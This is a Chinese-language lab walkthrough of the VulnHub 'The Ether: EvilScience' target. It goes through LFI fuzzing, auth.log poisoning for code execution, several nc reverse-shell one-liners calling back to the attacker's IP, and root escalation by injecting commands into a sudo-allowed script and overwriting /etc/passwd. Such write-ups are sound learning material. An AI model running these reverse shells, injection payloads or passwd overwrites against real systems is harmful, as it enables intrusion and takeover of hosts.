evalsciencet靶机通关笔记

前言

好久没打靶机了，这次找了一个还挺好玩的靶机，顺便写下笔记。

环境准备

靶机下载地址：https://www.vulnhub.com/entry/the-ether-evilscience-v101,212/

本地作为攻击方：192.168.199.119

靶机：未知具体ip (由于靶机用的是NAT模式)，可以确定的是在192.168.199.0/24内。

信息收集

先确定靶机ip

# nmap -sP 192.168.1.0/24
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-02 16:31 ?D1ú±ê×?ê±??
Nmap scan report for 192.168.1.1
Host is up.
Nmap scan report for 192.168.1.131
Host is up (0.0010s latency).
MAC Address: 00:0C:29:26:01:D6 (VMware)
Nmap scan report for 192.168.1.254
Host is up (0.00s latency).
MAC Address: 00:50:56:EF:D7:EB (VMware)
Nmap done: 256 IP addresses (3 hosts up) scanned in 31.83 seconds

扫描端口

# nmap -p- -A 192.168.1.131
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-02 16:38 ?D1ú±ê×?ê±??
Nmap scan report for 192.168.1.131
Host is up (0.00063s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 12:09:bc:b1:5c:c9:bd:c3:ca:0f:b1:d5:c3:7d:98:1e (RSA)
|   256 de:77:4d:81:a0:93:da:00:53:3d:4a:30:bd:7e:35:7d (ECDSA)
|_  256 86:6c:7c:4b:04:7e:57:4f:68:16:a9:74:4c:0d:2f:56 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: The Ether
MAC Address: 00:0C:29:26:01:D6 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.63 ms 192.168.1.131

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.82 seconds

开放了22和80端口，emm大概就这些。

测试

首先先从web入手，打开页面http://192.168.1.131:80
![img](/image

翻阅后发现了一处疑似有文件包含的地方

于是测试各种常见包含路径，但是没有什么进展。

再测下能否远程包含，在服务器上放了一个info.php，内容为phpinfo();

但是也没什么变化。

接下来直接上fuzz大法，字典用SecLists中的文件包含字典LFI-Jhaddix.txt

burp抓包后丢intruder

发现了几个返回长度不一样的包含路径

逐一访问后，发现除了/var/log/auth.log直接重定向到index.php，其他都是包含了一堆乱码，没什么用。

抓包访问包含/var/log/auth.log

既然能包含日志文件，那我们可以尝试向日志文件写入php代码，然后利用包含来执行getshell

通过ssh连接的用户名来写入日志文件

$ ssh ''@192.168.1.131
@192.168.1.131's password:
Permission denied, please try again.

执行命令ls试试

执行成功了，说明已经包含成功且执行了。

后面试了直接写了个一句话，但是菜刀蚁剑都连不上，可能是php版本或者其他原因。。

还是直接nc反弹吧，本地先开启nc监听

# nc -lvp 999
listening on [any] 999 ...

加上参数 exec=/bin/nc -e /bin/bash 192.168.199.119 999

再加上url编码

没有反弹成功

看了下大佬的wp，说可能是因为版本的原因，-e参数没有识别成功导致不能运行

于是试下没有-e参数的命令

mknod backpipe p && nc 192.168.199.119 999 0<backpipe | /bin/bash 1>backpipe
/bin/sh | nc 192.168.199.119 999
rm -f /tmp/p; mknod /tmp/p p && nc 192.168.199.119 999 0/tmp/

编码后测试第一条就可以了

# nc -lvp 999
listening on [any] 999 ...
connect to [192.168.199.119] from DESKTOP-6GE3653.lan [192.168.199.119] 10140
ls
1.php
2.php
about.php
backpipe
images
index.php
layout
licence.txt
research.php
xxxlogauditorxxx.py

提权

先查看下当前用户

whoami
www-data
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

sudo -l 查看当前权限

sudo -l
Matching Defaults entries for www-data on theEther:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on theEther:
    (ALL) NOPASSWD: /var/www/html/theEther.com/public_html/xxxlogauditorxxx.py
    (root) NOPASSWD: /var/www/html/theEther.com/public_html/xxxlogauditorxxx.py

能够运行xxxlogauditorxxx.py无需密码

尝试运行

sudo ./xxxlogauditorxxx.py
sudo ./xxxlogauditorxxx.py

===============================
Log Auditor
===============================
Logs available
-------------------------------
/var/log/auth.log
/var/log/apache2/access.log
-------------------------------

Load which log?:

输入/var/log/auth.log看看有什么

/var/log/auth.log
Jun  2 22:03:01 theEther sshd[1472]: Invalid user v1nt from 192.168.1.1
Jun  2 22:03:01 theEther sshd[1472]: input_userauth_request: invalid user v1nt [preauth]
Jun  2 22:03:04 theEther sshd[1472]: pam_unix(sshd:auth): check pass; user unknown
Jun  2 22:03:04 theEther sshd[1472]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.1.1

发现可以命令执行，并且权限比www-data大

尝试逻辑或执行命令 /var/log/auth.log|whoami

Load which log?: /var/log/auth.log|whoami
www-data

成功执行了，查看下/etc/passwd

Load which log?: /var/log/auth.log|cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin

也能成功执行。接着伪造/etc/passwd提权

openssl passwd -1 -salt vint abc123 #该命令用于生成hash，-1表示用MD5基于BSD的密钥算法。用户名为vint，密码是abc123

在原来的passwd加上，放到服务器上

然后wget下载，再覆盖掉原来的passwd

wget http://xxx.xxx.xxx.xxx:8081/passwd
ls
1.php
2.php
about.php
backpipe
images
index.php
layout
licence.txt
passwd
research.php
xxxlogauditorxxx.py

再覆盖掉原来的passwd

Load which log?: /var/log/auth.log | cp passwd /etc/passwd

再查看passwd

添加成功了。

最后切换到我们创建的用户就可以了。